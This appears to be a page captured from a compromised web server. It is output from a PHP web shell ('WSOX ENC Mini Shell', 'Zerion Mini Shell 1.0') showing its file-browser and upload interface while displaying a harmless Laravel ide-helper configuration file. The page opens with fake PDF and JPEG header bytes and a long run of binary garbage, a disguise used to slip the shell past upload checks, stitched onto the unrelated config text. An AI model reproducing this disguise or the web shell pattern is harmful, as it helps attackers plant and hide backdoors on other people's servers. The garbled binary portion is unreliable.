%PDF- %PDF- ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC
Mini Shell

Mini Shell

Direktori : /var/www/html/ctctaxi/config/
Upload File :
Create Path :
Current File : /var/www/html/ctctaxi/config/ide-helper.php

<?php

return array(

	/*
		    |--------------------------------------------------------------------------
		    | Filename & Format
		    |--------------------------------------------------------------------------
		    |
		    | The default filename (without extension) and the format (php or json)
		    |
	*/

	'filename' => '_ide_helper',
	'format' => 'php',

	/*
		    |--------------------------------------------------------------------------
		    | Fluent helpers
		    |--------------------------------------------------------------------------
		    |
		    | Set to true to generate commonly used Fluent methods
		    |
	*/

	'include_fluent' => true,

	/*
		    |--------------------------------------------------------------------------
		    | Write Model Magic methods
		    |--------------------------------------------------------------------------
		    |
		    | Set to false to disable write magic methods of model
		    |
	*/

	'write_model_magic_where' => true,

	/*
		    |--------------------------------------------------------------------------
		    | Helper files to include
		    |--------------------------------------------------------------------------
		    |
		    | Include helper files. By default not included, but can be toggled with the
		    | -- helpers (-H) option. Extra helper files can be included.
		    |
	*/

	'include_helpers' => false,

	'helper_files' => array(
		base_path() . '/vendor/laravel/framework/src/Illuminate/Support/helpers.php',
	),

	/*
		    |--------------------------------------------------------------------------
		    | Model locations to include
		    |--------------------------------------------------------------------------
		    |
		    | Define in which directories the ide-helper:models command should look
		    | for models.
		    |
	*/

	'model_locations' => array(
		'app/Models',
	),

	/*
		    |--------------------------------------------------------------------------
		    | Extra classes
		    |--------------------------------------------------------------------------
		    |
		    | These implementations are not really extended, but called with magic functions
		    |
	*/

	'extra' => array(
		'Eloquent' => array('Illuminate\Database\Eloquent\Builder', 'Illuminate\Database\Query\Builder'),
		'Session' => array('Illuminate\Session\Store'),
	),

	'magic' => array(
		'Log' => array(
			'debug' => 'Monolog\Logger::addDebug',
			'info' => 'Monolog\Logger::addInfo',
			'notice' => 'Monolog\Logger::addNotice',
			'warning' => 'Monolog\Logger::addWarning',
			'error' => 'Monolog\Logger::addError',
			'critical' => 'Monolog\Logger::addCritical',
			'alert' => 'Monolog\Logger::addAlert',
			'emergency' => 'Monolog\Logger::addEmergency',
		),
	),

	/*
		    |--------------------------------------------------------------------------
		    | Interface implementations
		    |--------------------------------------------------------------------------
		    |
		    | These interfaces will be replaced with the implementing class. Some interfaces
		    | are detected by the helpers, others can be listed below.
		    |
	*/

	'interfaces' => array(

	),

	/*
		    |--------------------------------------------------------------------------
		    | Support for custom DB types
		    |--------------------------------------------------------------------------
		    |
		    | This setting allow you to map any custom database type (that you may have
		    | created using CREATE TYPE statement or imported using database plugin
		    | / extension to a Doctrine type.
		    |
		    | Each key in this array is a name of the Doctrine2 DBAL Platform. Currently valid names are:
		    | 'postgresql', 'db2', 'drizzle', 'mysql', 'oracle', 'sqlanywhere', 'sqlite', 'mssql'
		    |
		    | This name is returned by getName() method of the specific Doctrine/DBAL/Platforms/AbstractPlatform descendant
		    |
		    | The value of the array is an array of type mappings. Key is the name of the custom type,
		    | (for example, "jsonb" from Postgres 9.4) and the value is the name of the corresponding Doctrine2 type (in
		    | our case it is 'json_array'. Doctrine types are listed here:
		    | http://doctrine-dbal.readthedocs.org/en/latest/reference/types.html
		    |
		    | So to support jsonb in your models when working with Postgres, just add the following entry to the array below:
		    |
		    | "postgresql" => array(
		    |       "jsonb" => "json_array",
		    |  ),
		    |
	*/
	'custom_db_types' => array(

	),

	/*
		     |--------------------------------------------------------------------------
		     | Support for camel cased models
		     |--------------------------------------------------------------------------
		     |
		     | There are some Laravel packages (such as Eloquence) that allow for accessing
		     | Eloquent model properties via camel case, instead of snake case.
		     |
		     | Enabling this option will support these packages by saving all model
		     | properties as camel case, instead of snake case.
		     |
		     | For example, normally you would see this:
		     |
		     |  * @property \Carbon\Carbon $created_at
		     |  * @property \Carbon\Carbon $updated_at
		     |
		     | With this enabled, the properties will be this:
		     |
		     |  * @property \Carbon\Carbon $createdAt
		     |  * @property \Carbon\Carbon $updatedAt
		     |
		     | Note, it is currently an all-or-nothing option.
		     |
	*/
	'model_camel_case_properties' => false,

	/*
		    |--------------------------------------------------------------------------
		    | Property Casts
		    |--------------------------------------------------------------------------
		    |
		    | Cast the given "real type" to the given "type".
		    |
	*/
	'type_overrides' => array(
		'integer' => 'int',
		'boolean' => 'bool',
	),
);

Zerion Mini Shell 1.0